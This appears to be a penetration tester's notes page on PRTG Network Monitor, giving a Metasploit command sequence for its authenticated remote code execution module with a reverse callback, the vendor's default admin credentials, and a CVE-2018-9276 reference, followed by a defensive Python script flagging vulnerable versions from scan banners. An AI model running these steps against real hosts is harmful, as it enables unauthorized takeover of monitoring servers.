PRTG Network Monitor


Paessler PRTG is a network monitoring tool. On Windows, it uses two folders, one for the program and another for the data:

C:\Program Files (x86)\PRTG Network Monitor
C:\ProgramData\Paessler\PRTG Network Monitor

If we have admin access, we can exploit an RCE.

For instance, with metasploit:

$ msfconsole -q
msf6> use windows/http/prtg_authenticated_rce
msf6> set RHOSTS <ip>
msf6> set LHOST tun0
msf6> run # try default password
msf6> set ADMIN_PASSWORD <password>
msf6> run

👻 To-do 👻

Stuff that I found but haven't read/used yet.

  • Default credentials (prtgadmin:prtgadmin)
  • Nmap (Indy httpd <version>)
  • CVE-2018-9276 (<18.2.39): command injection (poc)
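
A defender-side triage of the version items in the list above, as an added example that is not part of the original notes: it reads the version out of an `Indy httpd <version>` service banner and flags installs below the 18.2.39 threshold given for CVE-2018-9276. The banner text after the version, the sample hosts and the function names are constructed assumptions.

```python
import re

# Threshold taken from the notes above: CVE-2018-9276 affects versions < 18.2.39.
FIXED_IN = (18, 2, 39)

# Assumed banner shape, based on the "Indy httpd <version>" note above.
BANNER_RE = re.compile(r"Indy httpd (\d+(?:\.\d+){1,3})\b")


def parse_version(banner):
    """Return the version as a tuple of ints, or None if no version is present."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def triage(banner):
    """Classify one service banner as 'patch', 'ok' or 'unknown'."""
    version = parse_version(banner)
    if version is None:
        # No version in the banner: needs a manual check, not a silent pass.
        return "unknown"
    # Compare major.minor.patch only; pad short versions, ignore the build number.
    core = (version + (0, 0, 0))[:3]
    return "patch" if core < FIXED_IN else "ok"


def report(lines):
    """Map the first field of each scan line (the host) to its triage result."""
    return {line.split()[0]: triage(line) for line in lines}


# Constructed sample scan lines (documentation addresses, not real hosts).
SAMPLE = [
    "192.0.2.10 80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)",
    "192.0.2.11 80/tcp open http Indy httpd 18.2.39.1661 (Paessler PRTG bandwidth monitor)",
    "192.0.2.12 80/tcp open http Indy httpd 21.4.73.1656 (Paessler PRTG bandwidth monitor)",
    "192.0.2.13 80/tcp open http Indy httpd",
]

if __name__ == "__main__":
    for host, status in report(SAMPLE).items():
        print(f"{host}: {status}")
```

Hosts reported as `unknown` still need the version confirmed another way, and any reachable install should also have the default `prtgadmin` password changed.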